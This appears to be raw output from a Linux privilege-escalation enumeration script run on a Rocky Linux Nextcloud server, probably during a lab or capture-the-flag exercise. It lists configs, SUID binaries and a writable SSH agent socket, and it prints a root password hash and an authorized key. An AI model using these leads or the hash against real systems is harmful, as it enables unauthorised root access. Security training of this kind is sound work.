From '/var/lib/mysql/mysql/user.frm' Mysql user: query=select `mysql`.`global_priv`.`Host` AS `Host`,`mysql`.`global_priv`.`User` AS `User`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\') in (\'mysql_native_password\',\'mysql_old_password\'),ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\'),\'\') AS `Password`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1,\'Y\',\'N\') AS `Select_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2,\'Y\',\'N\') AS `Insert_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4,\'Y\',\'N\') AS `Update_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8,\'Y\',\'N\') AS `Delete_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16,\'Y\',\'N\') AS `Create_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32,\'Y\',\'N\') AS `Drop_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 64,\'Y\',\'N\') AS `Reload_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 128,\'Y\',\'N\') AS `Shutdown_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 256,\'Y\',\'N\') AS `Process_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 512,\'Y\',\'N\') AS `File_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1024,\'Y\',\'N\') AS `Grant_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2048,\'Y\',\'N\') AS `References_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4096,\'Y\',\'N\') AS `Index_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8192,\'Y\',\'N\') AS `Alter_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16384,\'Y\',\'N\') AS `Show_db_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32768,\'Y\',\'N\') AS `Super_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 65536,\'Y\',\'N\') AS `Create_tmp_table_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 131072,\'Y\',\'N\') AS `Lock_tables_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 262144,\'Y\',\'N\') AS `Execute_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 524288,\'Y\',\'N\') AS `Repl_slave_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1048576,\'Y\',\'N\') AS `Repl_client_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2097152,\'Y\',\'N\') AS `Create_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4194304,\'Y\',\'N\') AS `Show_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8388608,\'Y\',\'N\') AS `Create_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16777216,\'Y\',\'N\') AS `Alter_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 33554432,\'Y\',\'N\') AS `Create_user_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 67108864,\'Y\',\'N\') AS `Event_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 134217728,\'Y\',\'N\') AS `Trigger_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 268435456,\'Y\',\'N\') AS `Create_tablespace_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 536870912,\'Y\',\'N\') AS `Delete_history_priv`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_type\'),0) + 1,\'\',\'ANY\',\'X509\',\'SPECIFIED\') AS `ssl_type`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_cipher\'),\'\') AS `ssl_cipher`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_issuer\'),\'\') AS `x509_issuer`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_subject\'),\'\') AS `x509_subject`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_questions\'),0) as unsigned) AS `max_questions`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_updates\'),0) as unsigned) AS `max_updates`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_connections\'),0) as unsigned) AS `max_connections`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_user_connections\'),0) as signed) AS `max_user_connections`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\'),\'\') AS `plugin`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\') AS `authentication_string`,if(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.password_last_changed\'),1) = 0,\'Y\',\'N\') AS `password_expired`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.is_role\'),0) + 1,\'N\',\'Y\') AS `is_role`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.default_role\'),\'\') AS `default_role`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_statement_time\'),0.0) as decimal(12,6)) AS `max_statement_time` from `mysql`.`global_priv`
definer_user=mariadb.sys
source=SELECT\n Host,\n User,\n IF(JSON_VALUE(Priv, \'$.plugin\') IN (\'mysql_native_password\', \'mysql_old_password\'), IFNULL(JSON_VALUE(Priv, \'$.authentication_string\'), \'\'), \'\') AS Password,\n IF(JSON_VALUE(Priv, \'$.access\') & 1, \'Y\', \'N\') AS Select_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 2, \'Y\', \'N\') AS Insert_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 4, \'Y\', \'N\') AS Update_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 8, \'Y\', \'N\') AS Delete_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 16, \'Y\', \'N\') AS Create_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 32, \'Y\', \'N\') AS Drop_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 64, \'Y\', \'N\') AS Reload_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 128, \'Y\', \'N\') AS Shutdown_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 256, \'Y\', \'N\') AS Process_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 512, \'Y\', \'N\') AS File_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 1024, \'Y\', \'N\') AS Grant_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 2048, \'Y\', \'N\') AS References_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 4096, \'Y\', \'N\') AS Index_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 8192, \'Y\', \'N\') AS Alter_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 16384, \'Y\', \'N\') AS Show_db_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 32768, \'Y\', \'N\') AS Super_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 65536, \'Y\', \'N\') AS Create_tmp_table_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 131072, \'Y\', \'N\') AS Lock_tables_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 262144, \'Y\', \'N\') AS Execute_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 524288, \'Y\', \'N\') AS Repl_slave_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 1048576, \'Y\', \'N\') AS Repl_client_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 2097152, \'Y\', \'N\') AS Create_view_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 4194304, \'Y\', \'N\') AS Show_view_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 8388608, \'Y\', \'N\') AS Create_routine_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 16777216, \'Y\', \'N\') AS Alter_routine_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 33554432, \'Y\', \'N\') AS Create_user_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 67108864, \'Y\', \'N\') AS Event_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 134217728, \'Y\', \'N\') AS Trigger_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 268435456, \'Y\', \'N\') AS Create_tablespace_priv,\n IF(JSON_VALUE(Priv, \'$.access\') & 536870912, \'Y\', \'N\') AS Delete_history_priv,\n ELT(IFNULL(JSON_VALUE(Priv, \'$.ssl_type\'), 0) + 1, \'\', \'ANY\',\'X509\', \'SPECIFIED\') AS ssl_type,\n IFNULL(JSON_VALUE(Priv, \'$.ssl_cipher\'), \'\') AS ssl_cipher,\n IFNULL(JSON_VALUE(Priv, \'$.x509_issuer\'), \'\') AS x509_issuer,\n IFNULL(JSON_VALUE(Priv, \'$.x509_subject\'), \'\') AS x509_subject,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_questions\'), 0) AS UNSIGNED) AS max_questions,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_updates\'), 0) AS UNSIGNED) AS max_updates,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_connections\'), 0) AS UNSIGNED) AS max_connections,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_user_connections\'), 0) AS SIGNED) AS max_user_connections,\n IFNULL(JSON_VALUE(Priv, \'$.plugin\'), \'\') AS plugin,\n IFNULL(JSON_VALUE(Priv, \'$.authentication_string\'), \'\') AS authentication_string,\n IF(IFNULL(JSON_VALUE(Priv, \'$.password_last_changed\'), 1) = 0, \'Y\', \'N\') AS password_expired,\n ELT(IFNULL(JSON_VALUE(Priv, \'$.is_role\'), 0) + 1, \'N\', \'Y\') AS is_role,\n IFNULL(JSON_VALUE(Priv, \'$.default_role\'), \'\') AS default_role,\n CAST(IFNULL(JSON_VALUE(Priv, \'$.max_statement_time\'), 0.0) AS DECIMAL(12,6)) AS max_statement_time\n FROM global_priv;
view_body_utf8=select `mysql`.`global_priv`.`Host` AS `Host`,`mysql`.`global_priv`.`User` AS `User`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\') in (\'mysql_native_password\',\'mysql_old_password\'),ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\'),\'\') AS `Password`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1,\'Y\',\'N\') AS `Select_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2,\'Y\',\'N\') AS `Insert_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4,\'Y\',\'N\') AS `Update_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8,\'Y\',\'N\') AS `Delete_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16,\'Y\',\'N\') AS `Create_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32,\'Y\',\'N\') AS `Drop_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 64,\'Y\',\'N\') AS `Reload_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 128,\'Y\',\'N\') AS `Shutdown_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 256,\'Y\',\'N\') AS `Process_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 512,\'Y\',\'N\') AS `File_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1024,\'Y\',\'N\') AS `Grant_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2048,\'Y\',\'N\') AS `References_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4096,\'Y\',\'N\') AS `Index_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8192,\'Y\',\'N\') AS `Alter_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16384,\'Y\',\'N\') AS `Show_db_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 32768,\'Y\',\'N\') AS `Super_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 65536,\'Y\',\'N\') AS `Create_tmp_table_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 131072,\'Y\',\'N\') AS `Lock_tables_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 262144,\'Y\',\'N\') AS `Execute_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 524288,\'Y\',\'N\') AS `Repl_slave_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 1048576,\'Y\',\'N\') AS `Repl_client_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 2097152,\'Y\',\'N\') AS `Create_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 4194304,\'Y\',\'N\') AS `Show_view_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 8388608,\'Y\',\'N\') AS `Create_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 16777216,\'Y\',\'N\') AS `Alter_routine_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 33554432,\'Y\',\'N\') AS `Create_user_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 67108864,\'Y\',\'N\') AS `Event_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 134217728,\'Y\',\'N\') AS `Trigger_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 268435456,\'Y\',\'N\') AS `Create_tablespace_priv`,if(json_value(`mysql`.`global_priv`.`Priv`,\'$.access\') & 536870912,\'Y\',\'N\') AS `Delete_history_priv`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_type\'),0) + 1,\'\',\'ANY\',\'X509\',\'SPECIFIED\') AS `ssl_type`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.ssl_cipher\'),\'\') AS `ssl_cipher`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_issuer\'),\'\') AS `x509_issuer`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.x509_subject\'),\'\') AS `x509_subject`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_questions\'),0) as unsigned) AS `max_questions`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_updates\'),0) as unsigned) AS `max_updates`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_connections\'),0) as unsigned) AS `max_connections`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_user_connections\'),0) as signed) AS `max_user_connections`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.plugin\'),\'\') AS `plugin`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.authentication_string\'),\'\') AS `authentication_string`,if(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.password_last_changed\'),1) = 0,\'Y\',\'N\') AS `password_expired`,elt(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.is_role\'),0) + 1,\'N\',\'Y\') AS `is_role`,ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.default_role\'),\'\') AS `default_role`,cast(ifnull(json_value(`mysql`.`global_priv`.`Priv`,\'$.max_statement_time\'),0.0) as decimal(12,6)) AS `max_statement_time` from `mysql`.`global_priv`
grep: (standard input): binary file matches
From '/var/lib/mysql/mysql/help_topic.MAD' Mysql user:

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
Server version: Apache/2.4.53 (Rocky Linux)
Server built: Mar 18 2023 00:00:00
Nginx version: nginx Not Found

══╣ PHP exec extensions


-rw-r--r--. 1 root root 62625 May 17 08:04 /etc/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r--. 1 apache apache 28 Apr 19 15:38 /var/www/html/nextcloud/3rdparty/aws/aws-crt-php/php.ini


drwxr-xr-x. 4 root root 37 May 16 13:57 /etc/nginx
-rw-r--r--. 1 root root 136 Feb 28 12:36 /etc/nginx/conf.d/php-fpm.conf
upstream php-fpm {
server unix:/run/php-fpm/www.sock;
}
-rw-r--r--. 1 root root 473 Feb 28 12:36 /etc/nginx/default.d/php.conf
index index.php index.html index.htm;
location ~ \.(php|phar)(/.*)?$ {
fastcgi_split_path_info ^(.+\.(?:php|phar))(/.*)$;
fastcgi_intercept_errors on;
fastcgi_index index.php;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php-fpm;
}

drwxr-xr-x. 3 root root 18 May 16 13:57 /usr/share/nginx


╔══════════╣ Analyzing Http conf Files (limit 70)
-rw-r--r--. 1 root root 12005 May 9 03:39 /etc/httpd/conf/httpd.conf
-rw-r--r--. 1 root root 77 May 9 03:39 /usr/lib/tmpfiles.d/httpd.conf

╔══════════╣ Analyzing Wifi Connections Files (limit 70)
drwxr-xr-x. 2 root root 31 Apr 21 18:01 /etc/NetworkManager/system-connections
drwxr-xr-x. 2 root root 31 Apr 21 18:01 /etc/NetworkManager/system-connections
-rw-------. 1 root root 260 May 16 13:03 /etc/NetworkManager/system-connections/eth0.nmconnection


╔══════════╣ Analyzing Anaconda ks Files (limit 70)
-rw-------. 1 root root 1156 May 16 13:03 /root/anaconda-ks.cfg
rootpw --iscrypted --allow-ssh $6$TmCYXsD6GsLRMRO5$XmB6Ol5f.j8q2z31kfdTVNnBfGiERMgNsPrakaXO7/wR9Mniq85ALhCy1lSJflik7qiTwXsOLJ1AybcV1TvBG.

╔══════════╣ Analyzing VNC Files (limit 70)




-rw-r--r--. 1 root root 475 Apr 21 13:25 /usr/lib/firewalld/services/vnc-server.xml


Virtual Network Computing Server (VNC)
A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.



╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/ldap


╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)




-rw-------. 1 root root 553 Jul 18 13:36 /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDeyTyECqPLWrtqMbEfHQcHEQbS9Y13gYZM7z3+rY6qCOwrdZjDjmptiDlOup8GgguvoYHIiPC6Hut3PrPemUpy47hHl58zXMwoTrCJeDG69HV/YIBJ6eYntFH05zBbOOHehxVNSCzfNMy65eVCZgrRYFXeA7lzhUHMjtqC2+Ou1a68WQ/ONAe0YMLKSkYfixvwifvVdv4GZuBHrNlGdF9cZu+/suFzXKOsm0wGCpnyxhSqn2uy8Dp7bGS9FQruXVHGgz8BQKA5NxF8c4AHt0l1E3f5lavsDUty1mf6ufw5TE0zG6jGfA7Pr6E8EEFpy7b4AKiENG9oRWk965Te5DRpdKA6y88uSQ6bzMksbvCM5QQf/le3BerTsowiEdnuI6ilVUrydh3cMitHk803WZODok6OFrGbIVMuCAv24E5Q6ipCWCl+tuJcrtL8erj4jaR52SPycHY63LtRf89zXqs0PZdva22S/MLNd+j2H4b2pjPJ3z5sf1riiNLJVjoxo0=

-rw-r--r--. 1 root root 162 May 16 13:04 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r--. 1 root root 82 May 16 13:04 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r--. 1 root root 554 May 16 13:04 /etc/ssh/ssh_host_rsa_key.pub


══╣ Possible private SSH keys were found!
/etc/ssh/ssh_host_ed25519_key
/etc/ssh/ssh_host_ecdsa_key
/etc/ssh/ssh_host_rsa_key
/var/www/html/nextcloud/3rdparty/phpseclib/phpseclib/phpseclib/Crypt/RSA.php
/var/www/html/nextcloud/apps/user_saml/3rdparty/vendor/onelogin/php-saml/src/Saml2/Utils.php
/var/www/html/nextcloud/apps/snappymail/app/snappymail/v/2.27.3/static/js/min/openpgp.min.js
/var/www/html/nextcloud/apps/snappymail/app/snappymail/v/2.27.3/static/js/openpgp.js

══╣ Some certificates were found (out limited):
/etc/pki/ca-trust/source/ca-bundle.legacy.crt
/etc/pki/tls/certs/localhost.crt
/etc/pki/tls/certs/nextcloud.crt
/var/www/html/nextcloud/apps/nextcloud_announcements/appinfo/certificate.crt
/var/www/html/nextcloud/resources/codesigning/core.crt
/var/www/html/nextcloud/resources/codesigning/root.crt
1145PSTORAGE_CERTSBIN

══╣ Some SSH Agent files were found:
/tmp/ssh-XXXX2n9zBn/agent.1026

══╣ Writable ssh and gpg agents
/tmp/ssh-XXXX2n9zBn/agent.1026

Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x. 2 root root 4096 May 16 13:12 /etc/pam.d
-rw-r--r--. 1 root root 727 May 9 13:14 /etc/pam.d/sshd
auth substack password-auth
auth include postlogin
account required pam_sepermit.so
account required pam_nologin.so
account include password-auth
password include password-auth
session required pam_selinux.so close
session required pam_loginuid.so
session required pam_selinux.so open env_params
session required pam_namespace.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so
session include password-auth
session include postlogin


╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 0 Jun 23 2020 /etc/exports

╔══════════╣ Searching kerberos conf files and tickets
http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r--. 1 root root 880 Apr 18 08:15 /etc/krb5.conf
# To opt out of the system crypto-policies configuration of krb5, remove the
# symlink at /etc/krb5.conf.d/crypto-policies which will not be recreated.
includedir /etc/krb5.conf.d/

[logging]
default = FILE:/var/log/krb5libs.log
kdc = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log

[libdefaults]
dns_lookup_realm = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
rdns = false
pkinit_anchors = FILE:/etc/pki/tls/certs/ca-bundle.crt
spake_preauth_groups = edwards25519
dns_canonicalize_hostname = fallback
qualify_shortname = ""
# default_realm = EXAMPLE.COM
default_ccache_name = KEYRING:persistent:%{uid}

[realms]
# EXAMPLE.COM = {
# kdc = kerberos.example.com
# admin_server = kerberos.example.com
# }

[domain_realm]
# .example.com = EXAMPLE.COM
# example.com = EXAMPLE.COM
-rw-r--r--. 1 root root 189 Dec 9 2022 /usr/lib64/sssd/conf/sssd.conf
[sssd]
services = nss, pam
domains = shadowutils

[nss]

[pam]

[domain/shadowutils]
id_provider = files

auth_provider = proxy
proxy_pam_target = sssd-shadowutils

proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found

╔══════════╣ Analyzing FreeIPA Files (limit 70)

drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/dirsrv




╔══════════╣ Analyzing CouchDB Files (limit 70)
drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/couchdb


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd

╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x. 3 apache apache 45 May 16 13:59 /var/www/html/nextcloud/3rdparty/.github
drwxr-xr-x. 3 apache apache 42 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/myclabs/deep-copy/.github
drwxr-xr-x. 3 apache apache 23 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/nextcloud/coding-standard/.github
drwxr-xr-x. 2 apache apache 73 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/phpunit/php-code-coverage/.github
drwxr-xr-x. 2 apache apache 23 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/phpunit/php-file-iterator/.github
drwxr-xr-x. 2 apache apache 42 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/phpunit/php-timer/.github
drwxr-xr-x. 2 apache apache 23 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/diff/.github
drwxr-xr-x. 2 apache apache 25 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/environment/.github
drwxr-xr-x. 2 apache apache 23 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/global-state/.github
drwxr-xr-x. 2 apache apache 23 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/resource-operations/.github
drwxr-xr-x. 2 apache apache 25 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/type/.github
drwxr-xr-x. 4 apache apache 94 May 16 13:59 /var/www/html/nextcloud/apps/photos/vendor/hexogen/kdtree/.github
drwxr-xr-x. 3 apache apache 23 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/byte-stream/.github
drwxr-xr-x. 3 apache apache 23 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/parallel/.github
drwxr-xr-x. 3 apache apache 23 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/parser/.github
drwxr-xr-x. 3 apache apache 23 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/process/.github
drwxr-xr-x. 3 apache apache 23 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/sync/.github
drwxr-xr-x. 3 apache apache 42 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/rubix/ml/.github
drwxr-xr-x. 3 apache apache 42 May 16 13:59 /var/www/html/nextcloud/apps/suspicious_login/vendor/rubix/tensor/.github




╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

-rw-------. 1 echo.rivers echo.rivers 1280 May 25 08:40 /home/echo.rivers/.gnupg/trustdb.gpg
-rw-r--r--. 1 root root 3385 Sep 14 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r--. 1 apache apache 1019 May 25 08:41 /var/www/html/nextcloud/data/admin/files/operators_mail_backup.json.gpg

drwx------. 4 echo.rivers echo.rivers 132 Jul 15 10:23 /home/echo.rivers/.gnupg

╔══════════╣ Analyzing Cache Vi Files (limit 70)

-rw-------. 1 root root 850 Jul 15 10:47 /root/.viminfo

╔══════════╣ Searching docker files (limit 70)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
-rw-r--r--. 1 apache apache 1562 Sep 17 2022 /var/www/html/nextcloud/apps/suspicious_login/vendor/league/flysystem/docker-compose.yml


╔══════════╣ Analyzing Postfix Files (limit 70)
drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/postfix


╔══════════╣ Analyzing Zabbix Files (limit 70)


drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/zabbix


╔══════════╣ Analyzing DNS Files (limit 70)
drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/bind
drwx------. 2 root root 44 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/bind
-rw-------. 1 root root 4269 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/bind/cil
-rw-------. 1 root root 13111 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/bind/hll
-rw-------. 1 root root 2 May 16 13:23 /var/lib/selinux/targeted/active/modules/100/bind/lang_ext




╔══════════╣ Analyzing Interesting logs Files (limit 70)

-rw-------. 1 root root 4208 Jul 18 13:35 /var/log/php-fpm/error.log

╔══════════╣ Analyzing Windows Files (limit 70)






















-rw-r--r--. 1 root root 202 May 26 2022 /etc/my.cnf









-rw-r--r--. 1 root root 475 Apr 21 13:25 /usr/lib/firewalld/services/vnc-server.xml




















╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r--. 1 root root 492 Jan 23 17:42 /etc/skel/.bashrc
-rw-r--r--. 1 echo.rivers echo.rivers 492 Jan 23 17:42 /home/echo.rivers/.bashrc
-rw-r--r--. 1 root root 429 May 11 2022 /root/.bashrc



-rw-------. 1 root root 20 May 18 15:27 /root/.lesshst








╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x. 1 root root 72K Apr 16 01:17 /usr/bin/chage
-rwsr-xr-x. 1 root root 77K Apr 16 01:17 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 41K Apr 16 01:17 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 37K May 16 2022 /usr/bin/fusermount
-rwsr-xr-x. 1 root root 56K May 9 14:02 /usr/bin/su
